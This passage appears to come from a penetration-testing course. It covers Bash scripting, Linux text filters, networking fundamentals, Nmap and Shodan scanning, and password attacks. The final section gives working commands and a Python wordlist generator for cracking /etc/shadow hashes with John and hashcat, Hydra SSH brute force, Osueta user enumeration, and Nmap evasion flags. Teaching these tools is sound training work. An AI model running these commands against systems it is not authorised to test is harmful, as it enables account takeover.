Without this line, the script is launched via the shell from which the script was called; for example, if
we wrote a script based on Bash shell features, but the user runs the script from the ksh shell, the script
runs as a ksh shell script, and therefore the script does not work.
#!/bin/bash
Any executable (runnable) file in the Linux environment must have the appropriate execute
permission; the following gives the owner permission to read, write, and execute the script.
chmod 700 firstscript.sh
Variables
A variable is a character string to which we assign a value. The value assigned could be a number, text,
filename, device, or other data type. A variable is nothing more than a pointer to the actual data. The
shell enables you to create, assign, and delete variables. The name of a variable can contain letters (a
to z or A to Z), numbers (0 to 9), or the underscore character (_).
Unlike many other programming languages, Bash does not segregate its variables by "type"; therefore,
any declared variable is treated as a "character string" and interpreted according to its context.
To access the value stored in a variable, type the variable name prefixed with a dollar sign ($); for
example, in the previous demonstration, we set a variable named var and gave it the value "value".
Conditions - The IF Conditions
With the IF condition, if a specific condition is true, then something happens.
If the condition is false, the else branch specifies what happens instead.
Furthermore, we can tell the interpreter to test another condition if the first condition is false using
the elif statement (which stands for else if).
Syntax: if [ $<var> -eq/-ne/-lt/-le/-gt/-ge <number> ]
-eq - Equals
-ne - Not equals
-lt - Less than
-le - Less or equal
-gt - Greater than
-ge - Greater or equal
-f - True if FILE exists
-d - True if DIRECTORY exists
-z - True if VAR is empty
In this example, we check if the variable "var1" exists; if it does exist, we test whether it is bigger than
five or smaller.
Loops
A more practical use of while is the infinite loop; it can keep a script running until a condition
occurs or the user requests to exit (via a menu with an exit option). To create an infinite loop,
we must state an always-true condition; an example is the command "true".
Functions
To perform repetitive tasks, use functions.
To call the function, type its name.
A function can also accept parameters when it is called. These parameters are represented by $1, $2,
and so on, or by $@, which stands for all given parameters.
Practical Lab
Ifconfig
Open the terminal in Kali Linux and enter the command ifconfig.
The grep command filters and shows the lines that contain the phrase.
With the grep command, filter by the phrase broadcast.
The awk command filters and shows the specified column.
With the awk command, filter by the second column, which holds the internal IP address.
The new command with the filters applied is: ifconfig | grep broadcast | awk '{print $2}'
grep - filters the lines containing the characters "broadcast"
$2 - in the awk command, represents the second column we are filtering
The result is a clean output with the internal IP address.
Route
Open the terminal in Kali Linux and enter the command route -n. The route command gives us the
option to view the router's IP address (default gateway).
-n - show IP addresses instead of trying to resolve them to names
Using the -n flag, we receive the IP address: 192.168.1.1
Now, apply the same technique we used to filter the internal IP address to filter the router's IP address
from the rest of the output. Filter with grep for the phrase UG and with the awk command for the
second column, as we did with the internal IP address.
The command is: route -n | grep UG | awk '{print $2}'
Whois
The whois command's purpose is to give us information about IP addresses or domains. We use this
command to gain more information regarding the target IP address, such as country location and
service provider.
Sed
To filter the country in the output, apply the sed filter command.
▪ sed - is used to filter specific characters, lines, etc.
▪ The flag -e gives the ability to filter particular lines in the output
▪ The '4,4!d' is used to delete everything but line four of the output
▪ grep is used to filter the lines that contain addresses
▪ awk is used to filter the specific column
Wc
To see the number of lines the text file contains, use the command wc.
wc stands for Word Count and is mainly used for counting purposes.
-l - count the number of lines in the file
To see the number of characters the text file contains, use the -m flag.
To print the file content, use the cat command with the grep command to filter the lines containing
the word 'root'.
The wc command is added to the previous command to count the number of lines in which the word
'root' appears.
Use the sed command to replace every letter "e" in the file with the letter "x" and save it to a new file.
s - stands for substitute
g - stands for global: substitute every occurrence, not only the first one
Save the newly modified output to a new file.
To print the first ten lines of the file, use the head command with the -n flag.
head - used to print the top N lines of any given output. By default, the head command prints the top
ten lines.
-n - used to choose the number of lines from the top to print.
tail - used to print the last N lines of the given output. By default, the tail command prints the last
ten lines.
-n - used to choose the number of lines from the bottom to print.
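The lab's pipelines as an added example, not the course's live session: ifconfig, route -n, whois and a passwd-style file are replaced by constructed sample output in temporary files, so each filter can be checked offline; the sample values (addresses, names, the documentation range 203.0.113.0/24) and function names are made up:

```shell
#!/bin/sh
# Added example (not the course's live commands): the lab's grep/awk/sed/wc/head/tail
# pipelines run against constructed ifconfig, route -n, whois and passwd-style output
# stored in temporary files, so every filter can be checked offline.

IFCONFIG_OUT=$(mktemp); ROUTE_OUT=$(mktemp); WHOIS_OUT=$(mktemp); TEXT_FILE=$(mktemp)
trap 'rm -f "$IFCONFIG_OUT" "$ROUTE_OUT" "$WHOIS_OUT" "$TEXT_FILE" "$TEXT_FILE.new"' EXIT

cat > "$IFCONFIG_OUT" <<'EOF'
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.20  netmask 255.255.255.0  broadcast 192.168.1.255
        ether 00:11:22:33:44:55  txqueuelen 1000  (Ethernet)
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
EOF

cat > "$ROUTE_OUT" <<'EOF'
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.1.1     0.0.0.0         UG    100    0        0 eth0
192.168.1.0     0.0.0.0         255.255.255.0   U     100    0        0 eth0
EOF

cat > "$WHOIS_OUT" <<'EOF'
inetnum:        203.0.113.0 - 203.0.113.255
netname:        EXAMPLE-NET
descr:          Example ISP (constructed sample, documentation range)
country:        NL
admin-c:        EX123-SAMPLE
address:        Amsterdam
EOF

cat > "$TEXT_FILE" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
operator:x:4:37:operator:/root:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
EOF

# "broadcast" is matched case-sensitively, so the BROADCAST flags line is skipped and
# only the inet line remains; with several interfaces, one line per interface is printed.
internal_ip() { grep broadcast "$1" | awk '{print $2}'; }

# The default route is the line flagged UG (up, gateway); column 2 is the gateway.
gateway_ip() { grep UG "$1" | awk '{print $2}'; }

# '4,4!d' deletes every line except line four, which in the sample is the country line.
whois_country() { sed -e '4,4!d' "$1" | awk '{print $2}'; }

# grep keeps the address lines, awk keeps their second column.
whois_city() { grep address "$1" | awk '{print $2}'; }

# wc -l counts lines, here the lines in which 'root' appears (tr strips wc's padding).
root_line_count() { cat "$1" | grep root | wc -l | tr -d ' '; }

# wc -m counts characters.
char_count() { wc -m < "$1" | tr -d ' '; }

# s/e/x/g: substitute every e with x (g = all occurrences on a line, not only the first).
replace_e_with_x() { sed 's/e/x/g' "$1"; }

first_lines() { head -n "$2" "$1"; }   # top N lines
last_lines()  { tail -n "$2" "$1"; }   # bottom N lines

internal_ip "$IFCONFIG_OUT"                          # 192.168.1.20
gateway_ip "$ROUTE_OUT"                              # 192.168.1.1
whois_country "$WHOIS_OUT"                           # NL
root_line_count "$TEXT_FILE"                         # 2
replace_e_with_x "$TEXT_FILE" > "$TEXT_FILE.new"     # saved to a new file
first_lines "$TEXT_FILE" 2
```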
Module 4: Protocols and Services
TCP/IP and OSI Model
The OSI model shows the various actions required to transfer data over the communication network
and arranges them into layers.
7 - Application
6 - Presentation
5 - Session
4 - Transport
3 - Network
2 - Data Link
1 - Physical
Application Layer - This layer is the one presented to the end-user (a regular user with computer
access). This layer allows access to network resources.
Presentation Layer - This is the layer in which the operating system works with the data. The main
functions of this layer include translation, encryption, and compression of data. A user interacts with
the application layer, which sends the data down to the presentation layer.
Session Layer - This layer maintains proper communication by establishing, managing, and terminating
sessions between two computers. For example, whenever we visit any website, the computer must
create a session with the web server hosting that site.
Transport Layer - This layer has a critical job. It decides how much information should be sent at a time.
So, when you communicate with a website, this layer chooses how much data is transferred and
received at a given time. This layer provides reliable process-to-process message delivery and error
recovery.
Network Layer - The main job is to move packets from source to destination and provide
internetworking. The network layer is the layer at which routers operate. Since routers operate at the
network layer, the IP address belongs to the network layer.
Data Link Layer - This layer is responsible for organizing frames and ensuring hop-to-hop delivery. It is
the layer at which switches operate. Since switches operate at the data link layer, the MAC address
resides at the data link layer. All the computers in a specific network are plugged into a switch to
communicate with each other.
Physical Layer - This is the layer on which the real transmission of data bits occurs through a medium.
This layer is, as the name suggests, all the physical equipment that connects the computers.
TCP/IP Model
The TCP/IP model specifies how devices should transfer data over the internet to one another. The two
main protocols are TCP, which defines how applications create communication channels and how data
is broken down into packets before being transmitted over the internet, and IP, which defines how to
address and route packets for delivery.
Application Layer - The Application Layer consists of various protocols that perform the work of the OSI
model's Application, Presentation, and Session layers. This includes interaction with the application,
data translation and encoding, dialogue control, and coordination between systems. Such protocols are
HTTP, SMTP, NTP, SSH, and many more.
Transport Layer - This layer is like the transport layer of the OSI model. It is responsible for end-to-end
communication and delivery of data.
• TCP: Transmission Control Protocol is the reliable communication protocol, using sequence
numbers to identify each packet and ensure they are sent and received correctly. A three-way
handshake establishes the connection.
• UDP: User Datagram Protocol is the opposite of TCP. It is unreliable. The packets are sent without
any order, packets can easily get lost on the way to the host or server, packets are checked for
integrity only if they arrive, and the receiver cannot know the number of packets it was supposed
to get. Packets can be sent to the broadcast address, which undermines security.
Internet Layer - Once TCP/UDP have finished their job, the data is passed to the internet layer. This
layer's primary goal is to ensure the packets arrive at their destination network by providing logical
directions, such as addressing, path determination, and forwarding.
• IP: Internet Protocol. Responsible for sending packets from the source host to the destination
host by looking at the packet header.
• ICMP: Internet Control Message Protocol is encapsulated inside IP datagrams and is responsible
for reporting error messages. It can indicate success or failure when connecting to a remote IP
address through router-to-router datagram transfer. It uses two types of messages: the ICMP
request, to determine if the destination is reachable, and the ICMP reply, to check whether the
destination host is responding or not.
• ARP: Address Resolution Protocol finds a host's MAC address from a known IP address using its
table. ARP uses two types of messages: the ARP request, which is sent through the broadcast
address and waits for a reply, and the ARP reply; all the network devices receive the request, but
only the recipient responds, and the requester adds the recipient's physical address to its cache
memory and the datagram header.
Network Access Layer - This layer combines the data link layer and physical layer of the OSI model;
this layer's primary goal is to define how to send the datagram through the network. It carries out
functions like encapsulating the IP datagram into frames and mapping IP addresses to physical
addresses. The protocols used in this layer are Ethernet, Token Ring, FDDI, X.25, and Frame Relay.
Using the Internet - Basic Concepts
In the broad sense of the term, communication is the transfer of information or a message. The process
can take place between two or more people, animals, computers, etc.
The part relevant to us is communication between networking hardware, mainly between
communication networks, which we as human beings are in charge of operating, sometimes directly
and other times via operating systems or automated software.
Hub
Network component that creates a network between computers.
Switch
Acts as a smart hub. Creates a network of computers, but unlike the hub, the switch transfers
information to a specific destination, a designated computer in the network. All computers are
connected to the network with a network interface controller.
Router
Network component in charge of connecting networks. Responsible for routing the information
packets.
NIC
Network Interface Controller: enables the computer or any networking hardware it is installed in to
connect to a network.
WAN
Wide Area Network: a telecommunications network or computer network that extends over a
significant geographical distance. Able to connect several local networks or district networks.
LAN
Local Area Network: interconnects computers within a limited area such as a residence, school,
laboratory, university campus, or office building.
Packet
Formatted information package containing structured data carried by a communication network. The
packet is composed of a header, data, and a trailer. The header acts as the packet headline, containing
information regarding origin and destination. The data is the content of the sent package, the actual
data. The trailer is optional and marks the package's end; it contains information ensuring the
package reaches its destination without errors.
MAC Address
A unique, physical address stamped on every network hardware component at the time of production.
Octet
The name for each of the four numbers within an IP address. Each number is represented by 8 binary
digits and can be shown as a decimal (0-255) or as two hexadecimal digits.
IP Address
A numerical label used as a logical address to identify devices connected to a communication network.
These addresses divide the network so that a hierarchy is formed, making it possible to address one
device in the network rather than the whole network when sending a message or routing information.
Port
A number that allows software to direct data; it is represented in packets with a 16-digit binary number.
There are 65,536 ports for UDP (User Datagram Protocol) and 65,535 ports for TCP (Transmission
Control Protocol). Compare an IP address to a physical building; a port is the apartment number in
that scenario.
Protocol
A communications protocol is a procedure, a collection of rules and guidelines, defining how data is
requested and received. Protocols are essential for enabling both sides (network devices) to understand
each other and provide services that can be received correctly by the other side.
Gateway
An IP address that represents the path (gate) to external communication beyond the local network. In
most cases, the gateway's IP address is that of the router, enabling us to connect the local network to
the global internet.
IPv4
This is the 4th version of the Internet Protocol. An IPv4 address comprises 32 binary digits and is
represented by four decimal numbers separated by a dot (.); each of these numbers is a group of 8
binary digits. Their values are anywhere between 0 and 255.
IPv6
This is the 6th version of the Internet Protocol. An IPv6 address is built from 128 bits: the first 64 bits
(left) are used to identify the subnetwork, while the last 64 bits (right) are used as the interface ID. The
interface ID is set by the MAC address of the network adapter (NIC).
Subnet Mask
This value divides the IP address into the network part (255) and the computer part (0). It is a number
used to determine which part of the IP address identifies the network.
Bit
The primary digital unit of information (unit of data) in digital devices is a bit; a bit can be 0 or 1.
Byte - Unit of digital information comprised of 8 bits
Kilobyte - Unit of digital information equal to 1,024 bytes
Megabyte - Comprised of 1,024 kilobytes
Gigabyte - Comprised of 1,024 megabytes
Terabyte - Comprised of 1,024 gigabytes
Remote Connection Protocols
SSH: a cryptographic network protocol. It provides a secure communication channel over an
unsecured network to operate network services. For example, it can log into a remote machine and
execute remote commands. Any app can use SSH to secure the connection between the client and the
server. SSH uses public-key cryptography, which uses a pair of keys. One key is public, and the other
one is private. To decrypt the data, both keys are required. SSH was designed to replace the unsecured
Telnet protocol.
RDP: Remote Desktop Protocol is used by network administrators to connect remotely to other
devices for troubleshooting. RDP is on port 3389 by default and, for security reasons, requires
configuration by the endpoint user before it can be used.
FTP: File Transfer Protocol is a way to share files across computers on the same network. FTP is
client-server: the client requests the files, and the server provides them.
Telnet: this protocol does the same as SSH but is not secured. It provides a command-line interface on
a remote host. Telnet is not secure because the data transferred between the two hosts is not
encrypted, and anyone on the same network can intercept the traffic and read the data. There is no
authentication of the hosts, so they cannot be certain no one is listening to the traffic.
IPv4
An IPv4 address comprises 32 bits and is divided into four octets separated by a dot (.). Each octet
contains a number (0-255), a group of eight bits.
0-255.0-255.0-255.0-255
External IP
Used to connect to the internet.
Internal IP
Organizations and home networks use them.
10.0.0.0 - 10.255.255.255
172.16.0.0 - 172.31.255.255
192.168.0.0 - 192.168.255.255
Internal IP
Personal IP for each computer (loopback), 127.0.0.0-127.255.255.255; the best known and most used
is 127.0.0.1.
Primary IP
Network address (the name of the network), for example, 10.0.0.0.
Last IP
Used for broadcasting a general message to all computers in the network. For example, a message sent
to 10.0.0.255 is sent to all computers in that network.
Subnet Mask
Normal display: 255.255.255.0
Binary display: 11111111.11111111.11111111.00000000
CIDR display: /24
Classes
IP addresses are divided into classes; each class has its own subnet mask. Today, we do not need to use
these classes with their specific subnet masks, but it is essential to know them.
Class A: 1.0.0.0 - 126.255.255.255
255.0.0.0 - /8
Class B: 128.0.0.0 - 191.255.255.255
255.255.0.0 - /16
Class C: 192.0.0.0 - 223.255.255.255
255.255.255.0 - /24
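The octet, subnet mask, CIDR, class and internal/external range material above as an added worked example (not the course's code), using only shell integer arithmetic; the function names are assumptions:

```shell
#!/bin/sh
# Added example (not from the course): the octet, subnet mask, CIDR and class
# arithmetic described above, implemented with plain shell integer arithmetic.
# Functions print their result so they can be used in pipelines or captured with $( ).

ALL_ONES=4294967295   # 32 bits set: the widest value an IPv4 address or mask can take

# ip_to_int A.B.C.D: pack the four 8-bit octets into one 32-bit number.
ip_to_int() {
    set -- $(printf '%s' "$1" | tr '.' ' ')
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# int_to_ip N: the reverse, unpacking a 32-bit number into dotted decimal.
int_to_ip() {
    echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# octet_to_bin N: the 8 binary digits of one octet (0-255), e.g. 192 -> 11000000.
octet_to_bin() {
    n=$1; s=""; i=0
    while [ "$i" -lt 8 ]; do
        s="$((n & 1))$s"; n=$((n >> 1)); i=$((i + 1))
    done
    echo "$s"
}

# ip_to_bin A.B.C.D: the "binary display" of an address or mask.
ip_to_bin() {
    set -- $(printf '%s' "$1" | tr '.' ' ')
    echo "$(octet_to_bin "$1").$(octet_to_bin "$2").$(octet_to_bin "$3").$(octet_to_bin "$4")"
}

# prefix_to_mask P: the CIDR display /P as a dotted mask, e.g. 24 -> 255.255.255.0.
prefix_to_mask() {
    int_to_ip $(( (ALL_ONES << (32 - $1)) & ALL_ONES ))
}

# mask_to_prefix MASK: count the leading 1 bits of a dotted mask.
mask_to_prefix() {
    m=$(ip_to_int "$1"); p=0
    while [ $(( m & 2147483648 )) -ne 0 ]; do
        p=$((p + 1)); m=$(( (m << 1) & ALL_ONES ))
    done
    echo "$p"
}

# network_addr IP P: the network (first) address, i.e. the host bits cleared.
network_addr() {
    int_to_ip $(( $(ip_to_int "$1") & $(ip_to_int "$(prefix_to_mask "$2")") ))
}

# broadcast_addr IP P: the last address, i.e. the host bits all set.
broadcast_addr() {
    mask=$(ip_to_int "$(prefix_to_mask "$2")")
    int_to_ip $(( ($(ip_to_int "$1") & mask) | (mask ^ ALL_ONES) ))
}

# ip_class IP: the classful range the first octet falls in (ranges as listed in the text).
ip_class() {
    first=${1%%.*}
    if [ "$first" -ge 1 ] && [ "$first" -le 126 ]; then echo A
    elif [ "$first" -eq 127 ]; then echo loopback
    elif [ "$first" -ge 128 ] && [ "$first" -le 191 ]; then echo B
    elif [ "$first" -ge 192 ] && [ "$first" -le 223 ]; then echo C
    else echo other
    fi
}

# ip_scope IP: "internal" when the address falls in one of the three private ranges
# listed in the text (10/8, 172.16/12, 192.168/16), otherwise "external".
ip_scope() {
    if [ "$(network_addr "$1" 8)" = "10.0.0.0" ] ||
       [ "$(network_addr "$1" 12)" = "172.16.0.0" ] ||
       [ "$(network_addr "$1" 16)" = "192.168.0.0" ]; then
        echo internal
    else
        echo external
    fi
}

# Worked example with the values used in the text: 192.168.1.1 on a /24.
ip_to_bin 255.255.255.0        # 11111111.11111111.11111111.00000000
prefix_to_mask 24              # 255.255.255.0
network_addr 192.168.1.1 24    # 192.168.1.0
broadcast_addr 192.168.1.1 24  # 192.168.1.255
ip_class 192.168.1.1           # C
ip_scope 192.168.1.1           # internal
```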
Protocols and Services
In general, network protocols specify how, when, and why different internet devices should
communicate with each other. Think of them like traffic rules; if there were no rules, everyone driving
on the road would be in chaos and not know what to do. The protocols set standards and policies for
network traffic so that everything remains in order, and each device knows what to do with the data
it receives. On the other hand, network services are applications running on the network to provide
services to clients, such as email apps, the world wide web, print servers, and video-on-demand
websites.
DNS
Domain Name System serves as the phonebook of the internet. It resolves the domain names that
humans use to access websites into the IP addresses that computers use to locate data across the vast
network. Each device connected to the internet receives an IP address, which computers use to find it
by domain name. Without DNS's ability to translate domains to IPs, we would have to remember
187.148.52.44 to access our favorite website instead of doglovers.com. Four different DNS servers go
into action when a page is loaded.
• DNS recursor: the recursor is a server designed to receive queries from clients via applications
like web browsers. It then makes additional requests to fulfill the client machine's request.
• Root nameserver: the first step in translating human-readable requests. It sends the request to a
more specific server for further analysis.
• TLD nameserver: this is the middle station in the DNS translation request path. This server
holds the last portion of the domain name. If the website is www.news.com, the TLD
nameserver keeps the ".com" part.
• Authoritative nameserver: this is the last server. The hostname requested by the client
machine is translated into the IP address and sent back to the DNS recursor.
DNS Zone
A DNS zone is a DNS server or set of servers managed by a specific organization for delegating control.
A DNS zone is a database with all the IP addresses and hostnames that the organization owns.
DHCP
Dynamic Host Configuration Protocol is a network management protocol. Its primary goal is to assign
a unique IP address to each device connected to the network, along with the default gateway and the
DNS address. For example, take a big organization that has 50 computers. Instead of assigning an IP
address, gateway, and DNS server to each one, DHCP does it automatically for us. Each computer has a
DHCP client, and once that computer connects to the ethernet, the client sends a request to the DHCP
server asking for an IP address. The DHCP server responds and provides the 3 IPs we mentioned
before. In home and small business environments, DHCP runs not on a dedicated server but on the
router itself.
ARP
Address Resolution Protocol is a communication protocol for resolving IP addresses to MAC addresses.
IP addresses are required to locate another computer on the network. The physical address is required
to identify the device and connect with it. Each computer first looks in its local ARP cache for a
matching MAC address for the destination IP. If it is not there, the source host sends a broadcast
message over the network asking who has the destination's specific IP address, and the destination
host responds with its MAC address. Once that happens, the source and destination hosts keep each
other's IP and MAC addresses in their local ARP cache so that the next time they need to communicate,
the process flows much more smoothly.
Important Protocols
HTTP/S: the world wide web uses the HyperText Transfer Protocol. It specifies how HTTP messages
and status codes should be formatted and transmitted, and how servers and browsers respond to these
codes. The traffic between the browser and the web server is not encrypted. HTTPS is the same except
that the communication is encrypted.
The common status codes for HTTP/S are:
200 - OK
404 - Not Found
403 - Forbidden
511 - Authentication required
500 - Server error
Promiscuous mode
Promiscuous mode causes the controller to pass all traffic it receives to the central processing unit
(CPU) rather than only the frames the controller is programmed to receive.
Introduction to Scanning
Network scanning is a procedure for identifying active devices on a network by employing features of
the network protocol to signal devices and wait for a response. Most network scanning is used in
monitoring and management, but scanning can also identify network elements or users for attacks.
The specific protocol features used in scanning depend on the network. However, for IP networks,
scanning sends a simple message (ping) to each possible IP address in a specified range. It then uses
another protocol to obtain data on the devices if a response to the ping is received.
When we choose a site or network to scan, we first need to gather intel and know every piece of
information that can help us. The information-gathering stage is the first step in any attack. There are
two ways to collect data: passive and active. Passive scanning identifies weaknesses in systems by
relying on information collected from the network about the target without direct interaction with the
computer or the target network. For example, Google searches for articles about the company, its
employees, and more. The great advantage of passive scanning is that it does not leave traces, and
the target rarely knows that we scanned it and obtained information for future use. The disadvantage
of this scan is that it is limited in terms of information.
Performing an active scan is crucial. This scan collects information about the target, but unlike a
passive scan, we are in direct communication with it. For example, we expose information on a
computer such as open ports, operating systems, antivirus, and more. This scan usually leaves traces
and is recognizable, so maximum care is required when performing it. This scan's advantage is the
amount of information we receive on the target, which helps map the target's network and defenses.
Scanning with Nmap
An active scan tool, among the best. Nmap has many types of scans and several ways to avoid
detection. Types of scans: scanning for open ports and their versions, finding an operating system,
running Nmap scripts (NSE), checking available IP addresses (ping scanning), and more.
Useful flags
--open - Show computers with open ports.
-p - Scans for ports.
-F - Fast scan, scans 100 ports, compared to the default 1000 ports.
-A - Perform an aggressive scan using -O, -sV, -sC, and --traceroute.
-sC - Automatically uses the default NSE scripts.
--script - Manually selecting an NSE script.
--script-args - Set script arguments.
-sV - Banner grabbing, searching for the software version behind ports.
-Pn - Treats all computers as "on" (can pass a firewall).
-sS - Stealth, silent scan, avoiding detection - recommended for use.
-sP - Scan for identifying hosts on the network.
-sn - Ping scan.
-iL - File with IP addresses.
-sU - UDP scan.
-O - Operating system recognition.
-D - Decoy, enabling camouflaging an IP with a different IP.
-P0 - Avoids firewall protection for the ping.
-oN - Saves the output into a file.
-T2 - Slow scan, takes longer, but with fewer chances of getting blocked by security.
Basic Scans
The default scan scans the 1,000 most common ports.
Scan specific port(s)
root@kali:~# nmap -p <Port/s> <Target>
Adding the flag --open filters out the computers with closed ports and displays only the machines with
open ports.
Finding the version of the service
root@kali:~# nmap -sV <Target>
Computer scan for finding open UDP ports
root@kali:~# nmap -sU <Target>
Saving output to a file
Using the operator ">":
nmap 192.168.1.1 > fileName.txt
Using the flag "-oN":
nmap 192.168.1.1 -oN TextFile.txt
Scanning for a range of IP addresses
By range:
nmap 192.168.1-3.1-255
By subnet mask:
nmap 192.168.1.1/24
By file:
nmap -iL IPS.txt
Scanning with Shodan
Shodan is a web crawler that scans the entire internet for devices connected to the internet at least
once a month and stores the gathered information in a database.
https://www.shodan.io/
With Shodan, filter targets by text, title, domain, port, city, network, geography, operating system,
etc. For example, to search for any machine that runs an FTP service, type service:ftp
The result page is divided into statistics, used to filter the results further, and the results themselves.
Find the number of open FTP services in each country.
The 'free' searching is restricted. Therefore, we cannot search for a target by state without
registering on the site. The registration process is free.
Shodan automatically attempts to log in to the scanned services using the anonymous account and
default credentials.
A host's result page shows:
General information about the target
Web technologies (present if the host has web capabilities)
Possible vulnerabilities
Open ports
In-depth service information
Brute-Force
A brute-force attack is when the attacking computer tries every possible combination of characters
until it identifies the correct combination. Theoretically, an attack of this kind can break any
password, and it is carried out mainly as a last resort when there is no faster way to gain access to the
target or when the passwords are known to be short or to have a very specific structure.
To perform such an attack, produce a wordlist, a list of passwords that can be used on the target
machine. The first place to look for a password list is Google. With Google, check which passwords are
most common globally, passwords likely to be encountered in places with relatively low security. To add
more suitable passwords for the chosen purpose, use Cupp and CeWL.
CeWL
Generate a password list explicitly built for the victim; this can shorten the process by hours or days.
People are not so creative when it comes to choosing a password, so finding the correct password can
be much faster. For example, a construction company employee is more likely to use words related to
their work, such as build, soffit, grinder, hammer, etc. Economists are likely to use words like cash,
financial, economy, etc. It is human nature to choose a password from everyday experiences.
Therefore, many people use children, uncles, animals, birth dates, streets, and more. We use this
knowledge to build a list of passwords suitable for a company or employment area. This is the role of
CeWL; it is designed to collect words from the company site and create a list that is especially suitable
for its employees.
cewl -w niwlist.txt -d 3 -m 5 <target_related_info>
-w - Name of the file where the passwords are kept.
-d - Depth of the scan the tool performs on the site.
-m - Minimal length of a word. There is no need to add a short word to the list since there is a
minimum password length on most sites.
root@kali:~# cewl -w newList.txt -d 3 -m 5 www.sans.org
For the help screen:
root@kali:~# cewl --help
Crunch
Another tool for creating passwords is Crunch, which can create customizable passwords.
root@kali:~# crunch
For example, to create a five characters password, letters.
root@kali:~# crunch 5 5 abcdefghijklmnopqrstuvwxyz -o /root/Desktop/file.txt
The tool creates a file containing 11,881,376 passwords, all the possible permutations in English with
a length of 5 characters.
With Crunch, we can also create patterns. The placeholders are:
@   Lowercase letter.
,   Uppercase letter.
%   Number/digit.
^   Special character ($%#@! etc.)
Additionally, using the -t flag, we build passwords from a fixed pattern:
root@kali:~# crunch 6 6 abcdefghijklmnopqrstuvwxyz -t John@@
This command creates every six-character password that starts with the literal text John followed by two
lowercase letters from the character set we supplied (676 candidates, Johnaa to Johnzz). Combine all the
generated passwords into one file, ready for the task at hand. The next stage is the brute force itself,
using the file we created to attack the target servers.
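The following Python is an added example, not part of the course and not the code of CeWL or crunch. It reimplements both steps in miniature: harvesting words of a minimum length from a target's web page (the sample HTML is constructed, not a real site) and expanding crunch-style -t patterns, so you can see exactly which candidates a pattern like John@@ produces and how many there are. The symbol set behind ^ is a subset chosen here, not crunch's default.

```python
"""Wordlist building in miniature: harvest words from a target's web page the way CeWL
does, then expand crunch-style patterns (-t) and attach them to the harvested words."""
import itertools
import re
from html.parser import HTMLParser

# Constructed stand-in for the target company's website (not a real site).
SAMPLE_HTML = """<html><head><title>Acme Construction</title></head>
<body><h1>Acme Construction Ltd</h1>
<p>We build houses, soffit repairs, grinder and hammer work since 1998.</p>
<script>var tracking = "ignore-me";</script>
<p>Contact: info@acme-construction.example</p></body></html>"""

# crunch -t placeholders. The symbol set is a subset chosen here (assumption), not crunch's default.
PLACEHOLDERS = {
    "@": "abcdefghijklmnopqrstuvwxyz",
    ",": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "%": "0123456789",
    "^": "!@#$%^&*()-_+=",
}


class _TextExtractor(HTMLParser):
    """Collect visible text only; script/style bodies are skipped as a spider would."""
    def __init__(self):
        super().__init__()
        self.chunks, self._skip = [], 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def harvest_words(html, min_len=5):
    """CeWL-style harvest: unique alphabetic words of at least min_len characters (cewl -m),
    case preserved, in the order first seen."""
    parser = _TextExtractor()
    parser.feed(html)
    seen = {}
    for word in re.findall(r"[A-Za-z]+", " ".join(parser.chunks)):
        if len(word) >= min_len:
            seen.setdefault(word)
    return list(seen)


def expand_pattern(pattern):
    """Every string matching a crunch -t pattern. Characters other than the four
    placeholders are literals, so 'John@@' keeps the capital J exactly as crunch does."""
    sets = [PLACEHOLDERS.get(ch, ch) for ch in pattern]
    for combo in itertools.product(*sets):
        yield "".join(combo)


def pattern_size(pattern):
    """Number of candidates a pattern expands to, without generating them."""
    size = 1
    for ch in pattern:
        size *= len(PLACEHOLDERS.get(ch, ch))
    return size


def targeted_candidates(words, suffixes=("", "%%", "%%%%", "!")):
    """Combine harvested words with suffix patterns: hammer, hammer00..hammer99, ..., hammer!"""
    for word in words:
        for suffix in suffixes:
            yield from expand_pattern(word + suffix)
```

Feeding harvest_words() output into targeted_candidates() is the combination the text describes: company vocabulary plus the digit and symbol suffixes people append to satisfy password policies. pattern_size() is worth running before expand_pattern() on anything long; @@@@@ alone is the 11,881,376 lines quoted above.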
Offline Brute Force: Shadow file
Open /etc/shadow as root (or with equivalent privileges) and choose the user whose password you want
to brute force.
Copy the user's line, or at least the password hash field, into a separate file.
Use John the Ripper to crack the hash. Run without options, john first tries its "single crack" mode
(guesses derived from the user name), then its bundled wordlist with rules, and finally an incremental
brute force.
Cain or Cain & Abel
This Windows software is relatively old but still useful. It bundles several tools; the one of interest
here is offline brute force. Many sites store password hashes rather than the passwords themselves,
and with this software we attack those hashes. Download it from www.oxid.it/cain.html and install it.
Press the Cracker tab and input the hash; it is added to the list.
Right-click hash and start an offline brute force attack.
Online Brute-Force: Hydra
Hydra is a popular tool for online (network) brute force against login services.
root@kali:~# hydra -l UserName -P PasswordsFile -vV 10.0.0.15 ssh
-l    Single username whose password we try to crack (use -L for a file of usernames).
-P    Password file we created (use -p for a single password).
-vV   Verbose mode, showing each login/password attempt as it is tried.
The brute force attack was successful.
Osueta
This tool lets us check whether a user, or a list of users, exists on an OpenSSH server, using a timing
side channel. To use the tool, download it from GitHub.
git clone https://github.com/c0r3dump3d/osueta.git
root@kali:~# python osueta.py -H <HostIP> -U <UserNameToTry> -p 22
The tool first performs ten attempts with random user names to measure the normal response time and
then tests the user we set up; a response time that differs measurably from that baseline indicates that
the user exists.
oclHashcat
oclHashcat, the GPU-accelerated edition of hashcat (the two have since merged into a single hashcat), is
another tool for cracking password hashes offline.
root@kali:~# apt-get install oclhashcat
root@kali:~# oclhashcat -m 500 hashExample /root/Desktop/WordList.txt -o Found.txt
-m   Hash type (mode). Mode 500 is md5crypt, the $1$ scheme found in older /etc/shadow files.
-o   Saves the recovered passwords to a file.
